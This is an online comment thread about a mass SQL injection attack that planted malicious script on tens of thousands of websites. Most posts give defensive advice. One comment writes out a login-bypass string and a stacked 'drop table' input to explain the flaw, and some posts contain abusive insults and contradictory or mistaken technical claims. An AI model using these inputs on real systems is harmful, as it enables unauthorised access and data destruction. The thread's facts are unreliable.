Mass Hack Infects Tens of Thousands of Sites

An anonymous reader writes "Tens of thousands of Web sites have been compromised by an automated SQL injection attack, and although some have been cleaned, others continue to serve visitors a malicious script that tries to hijack their PCs using multiple exploits, security experts said this weekend. Hacked sites included both .edu and .gov domains, the SANS Institute's Internet Storm Center reported in a warning posted last Friday. The ISC also reported that several pages of security vendor CA's Web site had been infected. Roger Thompson, the chief research officer at Grisoft, pointed out that the hacked sites could be found via a simple Google search for the domain that hosts the malicious JavaScript. On Saturday, said Thompson, the number of sites that had fallen victim to the attack numbered more than 70,000. 'This was a pretty good mass hack,' said Thompson, in a post to his blog." By Sunday a second round of the same attack had infected over 90,000 servers.

Not surprised

Why am I not surprised to find everyone's favorite evil software monopoly's SQL server is the one being attacked?

Re:Not surprised

Mother fucking ponies. When will they ever learn

Microsoft are full of child fuckers and wife beaters, you honestly expect them to produce safe software?

When will people fucking learn

Re:Not surprised

SQL injection attacks are universal across database platforms. No matter what front-end and back-end you use for a database store, if you're building SQL command strings in memory with unscrubbed external inputs, you're liable for an attack. This attack relied on SQL Server's sysobjects table, but that wasn't the vulnerability, that was just the target.

Re:Not surprised

[Bigmilt8]

Thank you for printing this statement. It is amazing how most "technical" people don't understand what a SQL injection attack is and that it is platform independent. These attacks have to be stopped in your front-end development and not in the database engine. If you are writing code that is this unsecure (especially in 2007) then you shouldn't be coding at all. Also the MDAC was patched more than a year ago. Why weren't the patches applied?

Re:Not surprised

[Corporate+Troll]

Do you want to know what is even scarier?

In many corporate internal applications, SQL Injections are treated as if they do not exist. I have pointed out many times in several projects I have worked on that any malevolent person could do some very very nasty things. They don't care... "It's not open on the Internet". I just hope we'll never have a disgruntled employee that is a bit more geeky than the others.

*sigh*

Little Bobby Tables

Re:Not surprised

[JavaLord]

These attacks have to be stopped in your front-end development and not in the database engine.

Just so you know, by front-end, he doesn't mean javascript only (or at least I hope not). Check for SQL injection in whatever language your programming in too. Use prepared statements if you're using Java.

Re:Not surprised

[Wornstrom]

Also the MDAC was patched more than a year ago. Why weren't the patches applied?

I'll wager that it is the same camp of people who wait until they are absolutely forced to install service packs, because they don't want them to break their applications. Nothing worse than someone putting that bug in a small business "IT person's" ear... next thing you know none of their desktops have XP service pack 2 installed because they "heard it would break stuff"...

Re:Not surprised

Yep. Perhaps worse (because a little bit of knowledge can be more dangerous than having none at all), on a recent application we had built for our team, we were told that we didn't have to worry about SQL injection or other similar attacks because our interface used Javascript to "validate" the input. The developers couldn't grasp the idea that a malicious user might craft their own HTTP requests to send to the server, and when I pointed that out, they told me that additional client interfaces were not in scope so they couldn't be bothered to create them. Idiots.

Re:Not surprised

[BosstonesOwn]

Oh no way. Like where I work? My servers get hammered daily from our internal network because these idiots still have 60 updates to go before they bring all the windows desktops up to the current cycle.

My poor Solaris and Mysql logs get to look like an ebook when they are put into a pdf for examining. I got tired of requesting a security audit, so I can request a patch maintenance window. Went to the CIO and set it straight what can happen and he let me patch. Only 6 months after ! Damn slow moving corporate machines are not just MS based any more.

Re:Not surprised

Gee, I don't know. Maybe because it is the highest market share? Coincidentally, the same reason OS X is so "secure".

Re:Not surprised

[orgelspieler]

I've used un-scrubbed corporate app inputs to my advantage. At GE, we had two databases that didn't talk to each other. At all. We had to manually enter the data from one into the other line by line (why they paid engineers to do such mindless work is beyond me, maybe it's because we were on salary). Eventually, I figured out that the second database didn't get rid of things like HTML tags from the company front end app. So instead of entering the data line by line in the second database (which nobody ever used, except to print one form), I just wrote a script that output the appropriate HMTL table from the first database, and just pasted that into the "Comments" section of the second database. The result was a form that looked exactly like one that was entered line by line, but it took about two hours less to do it. It printed out fine, so none of the PHBs cared / knew the difference. Also, my method allowed people to do useful stuff like link to equipment data sheets and embed Goatse pictures before they resigned.

Re:Not surprised

Just so you know, by front-end, he doesn't mean javascript only (or at least I hope not). Check for SQL injection in whatever language your programming in too. Use prepared statements if you're using Java. Prepared statements should be used on every language, not just Java. PHP supports them (PDO, which, IMHO, is like Perl's DBI on steroids. Freaking sweet.). If more programmers would use it we'd stop seeing the "sql injection exploit of the week" that plagues most php scripts.

It's really easy. For example:

$stmt = $dbh->prepare("INSERT INTO theTable (value1, value2) VALUES (:value1, :value2)");
$stmt->bindParam(':value1', $value1);
$stmt->bindParam(':value2', $value2);
$stmt->execute();

Gibson

Think its bad now? Just wait for act two when they figure out how to hack The Gibson.

Re:Gibson

I just took a mass shit that left thousands of fish infected. Yes, I pooped in the river, thanks.

Okay Hands Up...

[AndGodSed]

...those of you who thought "Awesome!"

I am no fan of malicious hacking, but my inner geek always stirs when I read something like this, much like watching someone in the real world accomplishing an amazing but insane feat, like those guys with the squirrel suits base-jumping, or something *cough*

Question, where any *nix or L*X machines compromised? Might be a dumb question, so bash me all you want if it was...

Re:Okay Hands Up...

[renegadesx]

An above poster (and some fan of paedophelia and wife bashing) seem to think its M$ SQL Servers that got hit

At the same time it could just be flaming

Re:Okay Hands Up...

[ricebowl]

I don't know about "awesome," my first thoughts were along the lines of "oh...for fuck's sake..." and "how do I check?"

While I share your appreciation of feats, I'd prefer the feat achieved to be a positive application of the knowledge rather than a mass-hack.

But hey; that's just me being a grumpy old folk I guess.

Re:Okay Hands Up...

[slashbob22]

Question, where any *nix or L*X machines compromised? Might be a dumb question, so bash me all you want if it was... Considering it is a SQL injection attack I would assume that any system (of whatever OS) which is running a SQL database and is not scrubbing their input is vulnerable.

Re:Okay Hands Up...

[fmobus]

TFA guesses the exploit is a simple SQL injection where the injected code consists of calls to MS SQL Server's sysobject calls. I imagine this would give the attacker some file system access, allowing for injection of script tags pointing to the attacking javascript, and so on. This is a clever attack, once again allowed only by MS insistence in allowing things like an SQL Server to execute stuff not related to its task. Note that, while this is convenient and useful, it should never be allowed by default.

Re:Okay Hands Up...

[AndGodSed]

Ah there you have it then.

Cue the chorus; "Windows machines are only attacked because there are so many users..."

Sheesh, forgetting that 70% of servers run Linux...

Re:Okay Hands Up...

[pwilli]

It was even simpler than that (according to TFA):

1. SQL-Query for all tables in the database
2. Search for text-columns in table
3. add script-tag to every entry in those columns
4. hope at least some of those entries get included into the webpage without filtering (or escaping) the injected HTML

No need for FS access or root rights (as another ./er suggested), but also not really spectacular creative.

Re:Okay Hands Up...

[Bert64]

Or they could have used the xp_cmdshell function of mssql to actually execute commands, often as the SYSTEM user and thus infected the servers themselves with the malware payload.

Re:Okay Hands Up...

[morgan_greywolf]

I don't know about "awesome," my first thoughts were along the lines of "oh...for fuck's sake..." and "how do I check?" TFA seems to be saying that LinkScanner will check for it. Of course, it's worth noting that TFA's author is the 'Chief Research Officer' for the company that makes LinkScanner. IOW, this is a bit of a slashvertisement.

Re:Okay Hands Up...

What the fuck? Informative?

sysobjects is a virtual table that exists in every SQL database. There is no such thing as a "sysobject call", you are just making shit up.

The SQL injection method reads the names of tables from the sysobjects table, and reads the column information from the syscolumns table. Together these tables allow the attacker to construct a statement that will append an executable string to all the BLOB columns, in hopes that these will be presented to the user as part of an html page.

If you want to blame somebody for this, blame the browsers that execute code from untrusted sources.

Informative my ass. How about troll.

Re:Okay Hands Up...

If you only allow access through well parametrized stored procedures then you don't ever have to worry about SQL injection. This was an implementation issue, not a fundamental security flaw in the database/OS. I've got lots of MS SQL Server backed websites out there. None could be touched by this exploit.

Re:Okay Hands Up...

[weicco]

Huh. This reminds me one project where I stumbled into a huge SQL injection vulnerability. They we're creating SQL commands inside stored procedure by concatenating strings, without any input validation of course, and happily executed those. SQL Server wasn't directly connected to web but there was only a tiny ASP.NET layer which loaded every possible POST variable to the procedure. And again, no validations of any kinds, of couse. I think ASP.NET has somekind of protection against SQL injections but I, for one, wouldn't count solely on it.

Re:Okay Hands Up...

Helps to understand the database, doesn't it? The "sysobject calls" are just reads to the underlying tables that store the database schema. The injection attack uses sysobjects to determine what tables exist. They did use sysobjects which is specific to MS SQL Server and Sybase, but they could have just as easily used INFORMATION_SCHEMA which are a series of ANSI compliant views that contain the same information and work on virtually all databases.

This attack has nothing to do with system access of the database server. Other than the fact that the specific exploit looks to sysobjects, there is nothing specific about this attack to MS SQL Server at all. This same kind of attack would work just as well on any other web server with an application using any other database. The problem isn't that the web server or the database has a vulnerability, rather that the specific web application itself does. SQL injection attacks are stupidly common because the people who write web applications, on any platform, simply ignore written secure programming conventions.

For those who don't know what SQL injection is, it is caused when the web application does something stupid like concatenate unvalidated user input directly into a SQL string that is then sent to the database. This enables the attacker to pass user input which contains portions of SQL that will be also be sent to the database and executed under the security context of the web application. More often than not the developer who made this stupid mistake also made the stupid mistake of connecting to the database using significantly higher privileges than necessary, possibly even root/admin level privileges. Thus, the attacker can do virtually anything they want, from inserting new data to dropping objects and breaking the web application entirely, if they felt like it.

Basic rules when developing a database-driven web site:

1. Never concat input into SQL. In fact, avoid dynamic SQL entirely. Use stored procedures with parameter binding so that user input can never be used to inject SQL statements to the database.
2. Always validate/encode user input. Even if you stave off SQL injection it's still possible for an attacker to attempt to hide HTML or JavaScript in their input. If the web application stores and displays the information as it has been entered it would be possible for the attacker to embed malicious script into the content sent to the browser. Most frameworks have the ability to find this material in user input, or you could encode it so that it's not executed by the browser and shown as plain text.
3. Always use a database connection with the lowest necessary priveleges. This reduces the possible attack surface by preventing a successful attack from having the leverage to compromise the data or the database server itself. Couple this with item 1 and you have a security context in which the web application can only execute a handful of stored procedures and cannot directly read/write to any of the user tables.

Re:Okay Hands Up...

[berashith]

Even if it is an ad, they are apparently very good at what they do. I mean, infecting this many machines this quickly just so their product is needed... they are hella smart.

Re:Okay Hands Up...

[mhall119]

Nobody seems to know how the malicious code actually got into the server in the first place. Simple SQL injection is definitely a prime suspect, but it's also possible that there is some flaw in SQL Server's processing of properly parameterized code that still allows the tainted user-input to be executed.

Re:Okay Hands Up...

[0100010001010011]

Yes, sounds like someone didn't Sanitize their input.

If only they had little Bobby Tables doing the testing.

Re:Okay Hands Up...

[Tim+C]

It does, but there's nothing forcing you to use them - you can still grab a raw connection object yourself and hand-craft SQL concatenating strings without sanity checking them if you so wish.

Of course if you do you shouldn't be writing network-aware code.

Re:Okay Hands Up...

I think ASP.NET has somekind of protection against SQL injections but I, for one, wouldn't count solely on it.

No, it doesn't have any special protection. Sometimes you do need to build dynamic SQL statements and execute them. It it your responsibility to scrub your inputs.

Re:Okay Hands Up...

[tbannist]

Except, there are no reported infections on Unix or Linux and the infections itself seems tailored to attack MS-SQL (relying on it's specific system tables to identify tables to infect).

Also automated attacks like this usually rely on a specific injection vector (usually a common url on domains where the injection can be carried out). And although no one has explained exactly what software was exploited to do the injection, it might well be windows-only software, but that's just speculation on why it might not have hit any Unix servers.

It's also possible that some Unix servers have the vulnerability but because they don't have the MS-SQL system tables, the automated system was unable to actually infect them with anything.

Re:Okay Hands Up...

http://xkcd.com/327/

Re:Okay Hands Up...

[TheSpoom]

So question: What injection were they using to gain access to the DB to query it in the first place?

AFAICT I shouldn't be affected because my server is Linux and none of my users have access from anything but localhost, unless they were using an injection attack through some crappy script I might have had installed.

Re:Okay Hands Up...

[Durzel]

This would actually work really well on a lot of websites.

It's essential to sanitise user input, but how often do web developers assume their own data source could be tainted? Most of the code I've seen has had a strong distrust of the user but had a open floodgate as far as the already stored data was concerned. I can see why a hack like this would be successful.

Re:Okay Hands Up...

[kestasjk]

If you're on Firefox grab NoScript. You'd have to explicitly allow u8080.com to run scripts for this to have any effect.

Re:Okay Hands Up...

[Alioth]

Well, it is a dumb question - the TFA states that the attack used specific features of Microsoft SQL Server.

I was just surprised it wasn't yet another exploit in phpbb.

Re:Okay Hands Up...

[His+Shadow]

Don't forget that OS X has had more security patches applied lately, so it must be even MORE vulnerable.
Except it isn't.

Re:Okay Hands Up...

[anotherone]

ah ok let me just look this up on the vulnerability chart here ok, your server is Linux... very good, very good your databases are all only accessible to localhost, ok looks like you are EXACTLY as vulnerable to SQL injection as everyone else. Running Linux and preventing remote users on your database does NOT protect you. If you have a script on your server that doesn't sanitize even one input, you are just asking for trouble. you WILL get hacked sooner or later.

Re:Okay Hands Up...

[misleb]

So question: What injection were they using to gain access to the DB to query it in the first place?

That was my first question. Since it is a SQL injection, it is mostly platform independent, but for a mass hack there must be some common common webapp that they exploited. I mean, i know SQL injection is fairly trivial, but you still have to intelligently poke around a little bit to find exactly where and how to do it. If they DID managed to not only automate the SQL injection attacks on a massive scale but also automated the detection of vulnerable apps.. THAT would be pretty darn impressive. As well as a big wakeup call.

I, for one, am left feeling a little uneasy. While I know all the Ruby on Rails stuff I've written on our site is safe from SQL injection, we've also got a ton of crappy PHP code laying around that I didn't write. It is the kind of code that goes out of its way to be insecure. For example, many scripts just dump $_POST[] and $_GET[] to variables at the start of every sript. For all I know there are places where you could simply pass $admin = 1 in a GET request and have admin access. Ugh. I just don't have time to audit and fix all that crap.

Re:Okay Hands Up...

[Tablizer]

1. Never concat input into SQL. In fact, avoid dynamic SQL entirely. Use stored procedures with parameter binding so that user input can never be used to inject SQL statements to the database.

But things such as Query-By-Example with wild-card (LIKE) potential, a very powerful technique, cannot easily be done using stored procedures. We would have to cripple the power of computers and have programmers wasting time writing trivial queries/reports for users and/or a combinatorial explosion of query forms (I've seen that happen).

By the way, has anybody seen any sql injection attacks that don't involve quotes?

Re:Okay Hands Up...

[geekoid]

My first thought was "Hello, wake up time! there is a reason to pay for proper testing, and experienced developers."

Re:Okay Hands Up...

#1 Stored procedures for everything is just plain silly, parameterize your dynamic queries and you'll be just fine. Or actually get productivity gains by using an ORM which does it for you.
#2 Best practice says to Encode output sanitizing input is also helpful but there's no way you're going to catch everything.
#3 Database roles are your friend.

Re:Okay Hands Up...

[mordejai]

1. Never concat input into SQL. In fact, avoid dynamic SQL entirely. Use stored procedures with parameter binding so that user input can never be used to inject SQL statements to the database. It's not necessary to use stored procedures. You can use parameter binding in all major databases without SPs.

Re:Okay Hands Up...

[TheSpoom]

Whoop-de-fucking-doo. Read my post. I'm asking what script has the vulnerability. I'm not claiming some sort of immunity just because I'm running Linux.

Re:Okay Hands Up...

[TheSpoom]

Not to mention that the exploit attacks a feature specific to SQL Server. Unless you're suggesting I'm running some magical Linux version of SQL Server as well.

Re:Okay Hands Up...

[baggins2001]

3. Always use a database connection with the lowest necessary priveleges. This reduces the possible attack surface by preventing a successful attack from having the leverage to compromise the data or the database server itself. Couple this with item 1 and you have a security context in which the web application can only execute a handful of stored procedures and cannot directly read/write to any of the user tables.
Definitely first on the list.
1. Never concat input into SQL. In fact, avoid dynamic SQL entirely. Use stored procedures with parameter binding so that user input can never be used to inject SQL statements to the database. When prototyping database interfaces, dynamic SQL is often used and in books on database interfaces this is 90% what is taught. So sometimes the prototype gets dumped into production without clean up this crap. There are so many good reasons to use stored procedures, beyond just protecting against SQL injection.
2. Always validate/encode user input. Even if you stave off SQL injection it's still possible for an attacker to attempt to hide HTML or JavaScript in their input. If the web application stores and displays the information as it has been entered it would be possible for the attacker to embed malicious script into the content sent to the browser. Most frameworks have the ability to find this material in user input, or you could encode it so that it's not executed by the browser and shown as plain text.
I have yet to see a book that covers this to any significant extent. I think most programmers learn this on the go. I can remember vividly the day I learned what the '++' does. You'd think that someone would have a posting of a module for validate/encoding.

Re:Okay Hands Up...

[History's+Coming+To]

Handy bit of self-defence, yes, but you can't rely on your users to be savvy.

It's quite a hack though, ignoring the ethical points, that's a lot of machines.

Re:Okay Hands Up...

[LordActon]

3. Always use a database connection with the lowest necessary [privileges].

That's actually the whole answer. If done right, #1 and #2 are superfluous.

I'm appalled that 70,000 SQL Servers allow table-level access to the webserver. Hello? Do just this: write a stored procedure for everything your web app does. GRANT EXECUTE on those procedures -- and nothing else -- to the account running the webserver. Go home and sleep well, knowing no INSERT/UPDATE/DELETE will have any effect at all on your database.

<grumble> There are no technical problems, only people problems. </grumble>

Re:Okay Hands Up...

[Amouth]

no offence but a BLOB is a binary long object.. sticking a javascript string to the end of a blob would do nothing more than make the file seem croupt (depnding on file type) of the data stored in the BLOB.. they stuck it at the end of text feilds

Re:Okay Hands Up...

[Amouth]

I just don't have time to audit and fix all that crap. comments like this is why most places are vurable - where i work if we come accross a possiable security hole we stop what we are doing and figure out how long it will take and how many people we need to get it doen in a reasonable amount of time and that is what they do.

Re:Okay Hands Up...

I agree that such techniques shouldn't be thrown out for exclusive stored procedure access. Used properly they can be very powerful and there are existing frameworks which perform the necessary input validation to ensure that SQL injections are averted. I've written a few myself. Generally these frameworks just bind parameters to the batch anyway, or escape inputs for quotes or LIKE wildcards (if need be).

However, when I wrote the list I figured that it would be easier to just pound it into their heads that dynamic SQL is bad. Otherwise some arrogant idiot is likely to build a complex and vulnerable as all-Hell framework of dynamic SQL.

It's like telling a toddler not to touch the stove because it's hot. That doesn't mean that the toddler should never ever touch a stove in their entire lives, but rather that there is other information and experience necessary as a prerequisite before using the utility.

Re:Okay Hands Up...

[Cederic]

cannot easily be done So find the appropriate balance between programming complexity, usability and security.

Nobody said this was going to be easy :)

Re:Okay Hands Up...

[bwcbwc]

Apart from sanitizing their input, why aren't they sanitizing their permissions? If a web app only has access to a database via stored procedures, they can't even look at the table except through the stored procs. So your read-only data stays read-only. You'd still be vulnerable in user-submitted content for which your procedure is designed to allow updates to string or text data on a particular table, but even there the procedure can limit scope by (for example) only allowing updates to records belonging to the user ID. And for some applications, this requires a DBMS that allows large objects to be passed to a procedure, which isn't guaranteed.

Re:Okay Hands Up...

relying on it's specific system tables

it's = it is
its = belonging to it
</grammar Nazi>
I, however, don't think any less of you as a person, as the rest of your post was quite coherent, and actually quite informative (too bad I already used up my mod points). Just pointing out my pet peeve.

Re:Okay Hands Up...

Yea, they should have used INFORMATION_SCHEMA instead so the attack would work on other platforms?

RDBMS meta data access to objects the user is allowed access is hardly a security risk. **All** RDBMS platforms allow ... in fact rely on it. This is only an indication of your lack of knowledge not of poor security.

It was already game over at the point the injection occured -- auto-discovery of objects to mess with is mearly a consequence of loosing.

Re:Okay Hands Up...

[Kalriath]

That function needs to be explicitly enabled by changing configuration options while logged in as a user who is a member of the sysadmin role. And if you're enough of a dumb fuck to do that, you deserve to get hacked.

Re:Okay Hands Up...

[RedBear]

Considering it is a SQL injection attack I would assume that any system (of whatever OS) which is running a SQL database and is not scrubbing their input is vulnerable. OK, this may also be a dumb question, but why don't these SQL databases scrub their own input so every web form that gets created isn't automatically vulnerable to these SQL injection problems? Seriously, this is a massively widespread problem that's been around forever, and expecting every web developer to be an SQL security expert seems kind of like expecting every car owner to be a top-notch auto mechanic capable of stripping down their engine and reassembling it. Isn't there something that could be done at a lower level to stop most of these hacks from working and mitigate the rest? Or are we just going to continue to use the end-user's ignorance as an excuse not to develop at least a partial solution?

Don't even try to tell me there is no possible solution. I realize that this is a bit tricky because you can't simply totally block certain commands from the database or you won't be able to manage the database, but come on. There is always a way to add a layer of security.

Re:Okay Hands Up...

[misleb]

comments like this is why most places are vurable - where i work if we come accross a possiable security hole we stop what we are doing and figure out how long it will take and how many people we need to get it doen in a reasonable amount of time and that is what they do.

"People?" You mean there's more than just one of you capable of fixing such things? Lucky you.

Re:Okay Hands Up...

[sarathmenon]

Except, there are no reported infections on Unix or Linux and the infections itself seems tailored to attack MS-SQL (relying on it's specific system tables to identify tables to infect).

Also automated attacks like this usually rely on a specific injection vector (usually a common url on domains where the injection can be carried out). And although no one has explained exactly what software was exploited to do the injection, it might well be windows-only software, but that's just speculation on why it might not have hit any Unix servers.

It's also possible that some Unix servers have the vulnerability but because they don't have the MS-SQL system tables, the automated system was unable to actually infect them with anything. Isn't sybase vulnerable to this attack? They share the same code base afterall.

Re:Okay Hands Up...

[Allador]

First, this isnt a vulnerability in sql server. It's a sql injection attack. They just happen to have the infection vector assume sql server table structures if they are able to exploit the site.

Second, Sybase and MSSQL shared a code base back in SQL Server 5 days, right after MS bought it from them. They've diverged quite significantly since then.

Re:Okay Hands Up...

[Allador]

How do you scrub this:

select * from users where 1=1; drop table users;

The only significant thing that could be picked out there is 1=1, but thats jsut an easy way to do it, its not required.

The problem isnt in the database at all. The database just gets two commands, where the app programmer intended to send one.

The single most important thing is just for app developers to use prepared statements.

In other words, this is BAD:

sql = "select * from users where userid = '" & request.forms("userid") & "' and passwd = '" & request.forms("passwd") & "'; "
execute sql

but this is good:

sql = "select * from users where userid = ? and passwd = ?; "
execute sql with parm1 = request.forms("userid"), parm2 = request.forms("passwd")

In the first case, you just pick your username, and enter:

' or 1=1

for the password, and you've logged in. In the second case, you get nothing, because the password wasnt ' or 1=1.

But there ARE many things that can be done to mitigate the damage, even if you're vulnerable to sql injection.

1. Configure DB such that the account the app uses to access doesnt have dba/dbo rights on the database, or sa rights on the db system. That account should just be a regular non-privileged user account. No drop table users allowed.

2. Make sure any 'system hooks' that the db has to the underlying system are disabled. In other words, many databases have some function that allows you to call command line or shell commands. This functionality should be turned off.

3. Make sure the db itself is running as a non-privileged user. Back in the bad old days on windows, everyone ran their MS SQL server as SYSTEM. So that meant that if anyone could run arbitrary commands against the db server, they could effectively run arbitrary commands against the underlying OS. If the sql server runs as a non-priv'd user, then it just gives them the power to hose the sql server data, not the database itself or the underlying system.

There are other things that can be done I'm sure as well, thats just a quick, off the top of my head dump.

But you'll notice that none of these things are things in the db server itself, except maybe #2. Most modern db's have this turned off for non-sa users by default thought.

The rest is all in your app devs, and your system programmers (ie, installation & configuration).

Re:Okay Hands Up...

[Allador]

Huh? This had nothing to do with windows, other than they chose an attack implementation that would only work on ms sql server. But there's no exploit at the db layer.

Every DB server allows programmatic views and reflection of structures. They just chose to target sql server and write code that would only work there, rather than generic code, or code that would only work on mysql or oracle.

The app devs allowed arbitrary database commands to be passed to the database. Once thats happened, on any platform, you're exposed.

Good configuration and practices can heavily mitigate even this kind of thing. But the vector they chose, to write tags into CLOB fields, that targeted an ancient MDAC vulnerability in IE web browsers, wouldnt have been stopped by almost any mitigation strategy, other than possibly XSS scrubbing on the other end.

Re:Okay Hands Up...

[Allador]

No, it doesnt.

It uses a SQL Injection exploit to send commands to the DB server. This is an exploit and a vulnerability at the app layer.

Then they dont even TRY to do anything interesting or powerful like own the box at the db layer, since there's no vulnerability to exploit there. They just use common information-schema or other reflective features available in all dbs to find other tables with CLOB columns and modify the data there.

The only thing MS SQL server had to do with this was that the code they wrote to access the inforamtion-schema metadata, was written such that it would only work on ms sql server.

Thats not to say that an exploit was hit or used, just that the code was not platform agnostic.

The script that was injected into the CLOB fields (assuming that at least some would get presented dynamically on some websites) then attempted to hijack the IE browser by exploiting an 18-month-old-patched MDAC flaw on the desktop/IE.

In other words, there's no reason this wasnt done against MySQL or Oracle, they just chose not to. Since there's no exploit being targeted. They just chose not to write code that was db-platform-neutral.

Re:Okay Hands Up...

[Allador]

In addition to Kalriath's response, its been many years since it was a default configuration of MS SQL server to install as SYSTEM.

Re:Okay Hands Up...

[TheSpoom]

The exploit goes after a feature that is only found in SQL Server. I'm not trying to say that Linux is impervious to SQL injection. I'm saying that this specific exploit is targetting SQL Server and therefore will not affect me because I am not running it.

Re:Okay Hands Up...

[Allador]

The exploit goes after a feature that is only found in SQL Server. I would qualify that to say this:

The exploit is against sql injection at the app layer. Once the exploit has occurred and the app compromised, that script then uses features available in all modern databases (ANSI INFORMATION_SCHEMA views), but the syntax used in this specific implementation (sysobjects tables) will only work on MS SQL Server.

In other words, they could have written platform-neutral code for the db section, but they chose not to.

I hope I'm not starting to sound pedantic here. The misinformation I'm trying to correct (in general, not hugely specific to you) is that this whole thing was using any inherent weakness, or patched/unpatched hole in the ms stack targeted here. It does not.

In fact, its likely that this is just one component being tested of a larger, cross platform attack. The nature of this attack is such that it wouldnt be too much evolution to make this work across a large portion of webapps/db-server combinations out there. Just add a little platform detection and some dialect changes for the different platforms, and you're there.

Re:Okay Hands Up...

[Amouth]

if you are understaffed then you need to make that an issue to be resolved. you can not work effeciently if you are understaffed..

Phew! Nothing to see here!

[thechanklybore]

Woah, I was almost worried for a second before I read it was Microsoft specific!

My darling Apache and PostgreSQL may you never let evildoers overflow your fair buffers.

*wipes brow*

Re:Phew! Nothing to see here!

[Antique+Geekmeister]

For performance and security reasons, does anyone with real developers run SQL on an externally exposed website?

Re:Phew! Nothing to see here!

[thechanklybore]

You'd hope not. But having read my customary 2% of TFA I can't say I got any further than noticing it was a Microsoft-specific SQL hack and therefore irrelevant to me!

As it goes though nmap has dredged up quite a few database ports regularly for me when I've audited external-facing networks. Slackers.

Re:Phew! Nothing to see here!

[AndGodSed]

Teehee... would like to see a specific Wetnose OS graph to see which ones got hardest hit...

Re:Phew! Nothing to see here!

Why not? This attack is based on poor security practice. 70,000 server admins could just as easily leave a LAMP system unprotected from SQL injection, but you wouldn't be trolling then, would you.

Re:Phew! Nothing to see here!

Yes, because SQL Server is actually based on a solid system (Sybase). It can perform extremely well on a single server and the T-SQL language is much easier to use for web-style applications than PL/SQL.

The problem is that too many developers don't understand the server beyond writing simple stored procedures. In particular, you will often see a web application using a SQL login that has full access to the database (i.e., database owner). Having DBO means that the database is wide open to you if you find a SQL injection vulnerability. A more restrictive security policy is absolutely essential on SQL Server.

Well managed, SQL Server is an excellent choice for most applications. Where it falls away from Oracle and DB2 is in large-scale distributed/partitioned systems, and for functions that do heavy lifting (like preparing bank statements with interest calculations and so on).

Having just defended SQL Server so vigorously, I'll quickly add that I always choose Postgresql or Sqlite3 for my own software.

Adrian

Re:Phew! Nothing to see here!

[caluml]

Well, unfortunately, Apache and Postgres are not magically safe. However, mod_security can definitely help secure Apache, by filtering suspicious requests.

Re:Phew! Nothing to see here!

[rho]

What do you mean? Are there Web sites that have SQL in their code? Of course.

Re:Phew! Nothing to see here!

[daeg]

He meant running a SQL server on the same server as the web server.

Re:Phew! Nothing to see here!

I know. I often wonder if anyone still uses that legacy Microsoft stuff. I gues at least 70 thousand people do. Time to give them a call and help them with the upgrade.

Re:Phew! Nothing to see here!

[cHiphead]

Almost every shared hosting and VPS out there does that... just not with MS SQL quite so often

Re:Phew! Nothing to see here!

Only if you run a *nix. Everyone admin knows Windows servers can only run one server style application on hardware.

Re:Phew! Nothing to see here!

[mhall119]

70,000 server admins could just as easily leave a LAMP system unprotected from SQL injection, but you wouldn't be trolling then, would you. Yes we would, only we'd be mocking PHP coders not Microsoft.

Re:Phew! Nothing to see here!

[TheSpoom]

Yes. But it's MySQL and none of the users have access from anything but localhost. So it's kind of a moot point unless they find a remote exploit in MySQL itself that doesn't require a valid login, and that's a long shot.

Re:Phew! Nothing to see here!

[bberens]

Microsoft has saved us all once again. If Microsoft had not trained developers all across the world to use it's proprietary extensions rather than ANSI compatible SQL then something important might have been hit by this attack rather than poorly coded webapps running MSSQL. Thank you Microsoft for taking this bullet for us.

/too thick?

Re:Phew! Nothing to see here!

[bberens]

ITS ITS ITS ITS ITS *mutter*

Re:Phew! Nothing to see here!

[Antique+Geekmeister]

I *meant* that the database of a public server, for security and performance reasons, should not be SQL. One might be forced to do so for contractual or "corporate policy" reasons, but it's generally a pretty bad idea for the sort of reason we're seeing right now.

Re:Phew! Nothing to see here!

[Antique+Geekmeister]

That's exactly the sort of approach I'd recommend. One might, *might* add a read-only client or guest for permitting access from other local servers, or for developers to download and use the database locally, or for system monitoring.. One might also sanely add a master/master server in parallel, for failover operations.

Re:Phew! Nothing to see here!

I *meant* that the database of a public server, for security and performance reasons, should not be SQL. One might be forced to do so for contractual or "corporate policy" reasons, but it's generally a pretty bad idea for the sort of reason we're seeing right now.

So, you're saying that /. should dump it's MySQL database server that runs the site for a database that uses some proprietary query language?

What I suspect you really meant to say was some sort of slam at Microsoft SQL Server, but couldn't quite articulate it fully. There isn't anything inherently insecure about MS SQL Server with regards to SQL injection...every database server using SQL is vulnerable to this sort of attack, if the programmer who wrote the code that connects to the database doesn't take care to sanitize the input.

Re:Phew! Nothing to see here!

[Mister+Whirly]

Wow, your informative well thought out post was so incredible, I just had a brain aneurysm processing the wealth of intelligence it contained. You obviously understand programming, especially platform-independent programming, so well it is scary. It is just not fair that one AC should have so much divine knowledge.

Or you could just be a total trolling choad who has no concept of back-end and front-end when it comes to databases.

Re:Phew! Nothing to see here!

Thats because compared to MS nobody uses Apache/Postsql very much. They attach the masses. If it was the other way around you would be attacked just as easily as MS. Keep your head out of the cloud before its lopped off by an airplane. One day I hope linux gets much needed humility.

Re:Phew! Nothing to see here!

[Amouth]

this reminds me.. i remember auditing a few sites for peope.. it kills me when i see them using includes in iis.. and making all their files .inc's (which IIS will just spit back as plain text so you can read the code).. worst part is that they even have their db open include like that.. so hey look.. there is the username/password and address of the sql server.. wheeeee.. what fun..

too many stupid people out there

Re:Phew! Nothing to see here!

[Allador]

Yeah, little places like bn.com, microsoft.com, msnbc.com, nasdaq.com, etc.

Seriously though, yeah, MS SQL is widely used for corporate built web apps exposed to the world.

Re:Phew! Nothing to see here!

[Allador]

Thats pretty unusual, in my experience. Standard practice is to either pass .inc through the asp interepreter or make all your inc files .asp.

In addition, I've never seen nor heard of a site that embedded user/pass for the db in an inc file. The standard practice in that world is to make them application level variables in global.asa.

Re:Phew! Nothing to see here!

[Allador]

Umm, what?

I think you need to re-read the article.

Your post which so snidely seems to imply that this was a result of non-ansi sql, or some vulnerability in an MS product, is woefully off base.

Re:Phew! Nothing to see here!

[Amouth]

sadly standard practice doesn't equal what happens in reality in alot of places.. the smaller the company the simpler the mistakes - and there are alot more small companies than large ones

SQL injection

[hesaigo999ca]

Nothing new, this seems like the same old story over and over, sql injection to gain root, once u got it, then u got it for good, redirects to a web site with hacker friendly code, voila , you got malware. I am surprised that this is something still making news. I guess for the next generation of pc users, we need to educate them. I always said owning a computer is like ownign a car, you would never use a car without knowing how to drive, although you did buy the car. Same applies for computers, or in this case web development. Not because someone can throw some html and asp together that it makes them a web programmer....

Anyways I am just rambling as usual, go ahead troll me...

"the best way to predict the future is to invent it!"

Re:SQL injection

[sjaguar]

